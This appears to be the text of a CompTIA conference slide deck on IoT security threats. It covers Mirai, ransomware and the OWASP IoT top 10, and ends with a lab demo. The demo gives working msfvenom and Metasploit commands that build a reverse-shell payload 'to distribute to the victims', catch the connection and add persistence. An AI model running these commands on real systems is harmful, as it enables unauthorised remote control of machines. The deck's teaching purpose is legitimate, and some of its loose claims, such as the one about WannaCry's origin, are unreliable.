This is the presentation that I delivered at InfoSec Netherlands. In the era of Digital Transformation, organisations are finding efficiencies with deploying systems and devices that are always connected - dubbed as the Internet of Things (IoT). If these 'things' are not carefully configured and maintained then they are a threat to your business. I discussed the common weaknesses that attackers exploit on IoT systems and the cybersecurity skills that you need to mitigate against them. The session also included a live attack to demonstrate how a device can become compromised.
Report
Share
Report
Share
1 of 49
Download to read offline
More Related Content
Protecting your Organisation from the Internet of Evil Things
2. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Voice of the World’s IT Industry and over 1.5 million IT Professionals
✓ Higher Salaries
✓ Growing Demand
✓ Verified Strengths
✓ Universal Skills
“Three of the ‘Top 10
Certifications That Help IT
Workers Get Jobs’ are CompTIA
certifications.”*
CERTIFICATIONS
Largest Provider of Vendor-
Neutral IT Certifications
A non-profit trade association with
more than 4,000 members and
business partners. Our members
drive our programs through their
participation in CompTIA
communities, research studies,
events, sharing of best practices and
more.
ASSOCIATION
4,000+ IT Channel
Providers & Partners
A 501(c)(3) charitable organization
that creates on-ramps for successful
IT careers, serving individuals who
are underrepresented in IT and
lacking in opportunities to be
successful in IT, including veterans,
youth, and the unemployed.
PHILANTHROPY
Creating IT Futures
Foundation
Our advocacy division encourages
collaboration and advancing of
legislation that allows the private
sector to develop new products and
services, find solutions and sell
them in the global marketplace.
ADVOCACY
Public Policy & Reform
* Source: The Dice Report, February 2012
3. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Zeshan Sattar
From Cybernetics to Cybersecurity
3
2004
• BSc Cybernetics & Virtual Worlds
• IT Support Tech, UK & Japan
2007
• Systems Administrator
• Technical Trainer, Europe
2013
• IT Expert Consultant, Worldwide
• Head of Curriculum
2015
• Certification Evangelist
4. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Agenda
▪ Introduction
▪ What is IoT?
▪ What is IoET?
▪ Examples of Cyber attacks
▪ Human error
▪ CompTIA certifications
▪ Guided Demo : Compromising a Windows client
4
5. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 5
6. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
What is the
Internet of
Things?
The Internet of things (IoT)
is the inter-networking of
physical devices, vehicles
(also referred to as
"connected devices" and
"smart devices”)
Which simply means…
6
7. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Everything Has Become Connected
7
Smart Car
Smart Suit Smart House Tablet
Smart Phone
Desktop/Laptop
Smart Shoes
Internet CCTV
Smart Watch
Smart Cities
The Internet
8. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
What is the Internet of Things?
▪ The main problem is that because the idea of networking appliances and
other objects is relatively new, security has not always been considered in
product design.
▪ Consumers often fail to change the default passwords on smart devices or if
they do change them, fail to select sufficiently strong passwords.
8
9. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org9
10. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Concerns
▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security,
permissions and encryption
▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security &
authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.
▪ Application-level security:
–Default admin passwords
–Weak passwords
–Not using encryption over the network
–Open ports.
▪ Protocol-level security:
–Wireless protocols such as ZigBee & Bluetooth
10
11. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Internet of Evil Things
11
12. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 12
13. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
What is the Internet of Evil Things?
▪ It is the Internet of Things but used in a negative way to hurt you.
▪ By detecting vulnerabilities, they can control your:
– Car, house, phone, computer
– Your identity can be stolen, You can be killed, You can be blackmailed
– You can end up in jail because of an attack that took place while you were
asleep
13
14. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Examples of IoT devices
14
15. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The accessible IoT devices
15
16. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Problems?
▪ Limited CPU on devices
▪ Encryption & identity keys
▪ New devices with new
OS/software
▪ Too much network traffic
▪ Wi-Fi connected home
appliances
▪ GUI & Internet Browsers
▪ Hardware Trojans
16
17. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Cyber Attack Examples
17
18. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org18
19. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
What is Mirai?
▪ Mirai is the Japanese word for Future.
▪ In IT, it is a Malware that attacks out-of-date Linux devices remotely
▪ It controls the devices and turn them into a botnet for further attacks
▪ It scans the internet looking for IP addresses of IoT devices.
▪ Some of the popular website affected were: GitHub, Twitter, Reddit,
Netflix, Airbnb
▪ BASHLITE is another malware that performs a DDoS Attack on Linux
Systems
19
20. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
More about Mirai
▪ On the 21st of October 2016. Mirai-fueled zombie botnet army was
deployed on Dyn.
▪ Dyn is one of the world’s largest DNS providers
▪ The attack resulted in taking down internet access in many of America’s
largest cities.
▪ Mirai gave us a view on how the IoT can turn into an IoET by controlling
many devices and maybe shutting them down
20
21. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org21
22. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Mirai – one year on…
▪ 66% of IT Pros said they either haven’t checked or don’t know how to
check their devices for Mirai
▪ 20% said their IoT devices were hit with ransomware attacks last year.
▪ 16% of respondents say they experienced man-in-the-middle attacks
through IoT devices.
▪ 23% of IT security professionals monitor connected devices coming into
their offices
22
Source: Pwnie Express
23. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Onion Routing (TOR)
▪ Onion routing is a technique for anonymous communication over a
computer network. In an onion network, messages are encapsulated in
layers of encryption, analogous to layers of an onion. ... When the final layer
is decrypted, the message arrives at its destination.
▪ Tor aims to conceal its users' identities and their online activity from
surveillance and traffic analysis by separating identification and routing.
▪ It is an implementation of onion routing, which encrypts and then randomly
bounces communications through a network of relays run by volunteers
around the globe
23
24. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org24
Ransomware
25. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Steps to Ransomware
25
Infected file or Email link to a page User redirected to Site File Downloaded to the system
File InstalledUser Data EncryptedPay or Pay
26. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
WannaCry
▪ WannaCry Ransomware
▪ One of the worst spread malware
▪ Developed by the NSA “Eternal Blue”
▪ Supposedly weaponized by North Korea
▪ This Ransomware is still spreading
26
27. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Top 10 IoT Vulnerabilities
1. Insecure Web Interface
2. Insufficient Authentication/Authorization
3. Insecure Network Services
4. Lack of Transport Encryption/Integrity Verification
5. Privacy Concerns
6. Insecure Cloud Interface
7. Insecure Mobile Interface
8. Insufficient Security Configurability
9. Insecure Software/Firmware
10. Poor Physical Security
27
Source: OWASP
28. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Shodan.io
28
29. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Some Dangerous Apps
29
▪ Flashlight
▪ Tinder
▪ Snapchat
▪ Blendr
▪ Whisper
▪ Yik Yak
▪ Poof
▪ Omegle
▪ Clean it
▪ Deep Clean
▪ Flappy Cat
▪ Light VPN
▪ DU battery Saver & Fast Charge
www
▪ Lazy Listen audiobook
▪ Kik Messenger
▪ Whatsapp Bomber
▪ Quick Pic
▪ ES File Explorer
▪ UC Browser
▪ Dolphin Web Browser
▪ Clean Master
▪ Whale Camera
▪ Blinking Camera
▪ File Master
▪ Art Camera
30. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Sample Malware / Virus Codes available on GitHub
(for Research)
30
Ransomware
Code
Worm
Code
Virus
Code
Mirai
Slice Code
Batch File
Code
DoS
Code
31. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
How would a HACKER use IoT against you?
31
32. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Hacking Steps
32
Covering Tracks
Maintaining Access
Gaining Access
Scanning
Reconnaissance
To protect against a hacker, you have to think like a hacker
33. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
How would a HACKER use IoT against you?
▪ Blackmail
– What Happened?
▪ Identity Theft / 419 Scam
– Why do they need it?
▪ Phishing
– What info are they looking for?
▪ Health Reports
– What do they do with it?
33
34. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Quick Tip
34
35. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Solutions?
▪ IoT Security means opens new gates for security professionals to develop security
solutions
▪ Network Security:
– How many devices transfer unencrypted data?
– What are these devices?
– Which are most active?
▪ User Security:
– Do you need that software?
– Is it trustable?
– Is it from the vendor?
35
36. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org36
37. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 37
44. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Guided Demo of an
Attack
▪ How can you simulate this at home?
– Virtualization Software (Hyper-V, VMWare Player, Virtual Box)
– Kali Linux
– Windows client
– Tip: set up a Windows Server VM to provide DHCP to the virtual
network and use an isolated VM network
The attack performed here is for Demonstration, Awareness and Educational
purposes. Performing the same is at your own Risk.
45. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Commands to the demo (1/3)
▪ On the Kali Linux VM, open a terminal window and type the following
command:
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe
▪ This command creates the exploit.exe and stores it in the Home folder ready
for you to distribute to the victims (USB, email, web link etc.)
▪ The IP address is of your Kali VM
▪ Then launch Metasploit by typing the following command:
msfconsole
45
46. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Commands to the demo (2/3)
▪ Now, we will configure the Kali VM to listen for the user to launch the
exploit, by typing:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.10
set LPORT 4444
exploit -j –z
▪ Your Kali VM is now ready for the attack to happen. On your Windows client,
double click the exploit.exe
▪ You will notice that the Kali VM receives the connection
46
47. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Commands to the demo (3/3)
▪ We can now interact with the connecting machine by typing:
sessions -i 1
▪ We want to ensure that if the user logs off/restarts the machine, we can
reconnect. This can be done by adding persistence:
run persistence -U -i 5 p 4444 r 192.168.2.10
▪ We now have full control of the system and can carry out various commands.
The commands that you can use, can be viewed by typing:
Help
▪ Enjoy hacking!
47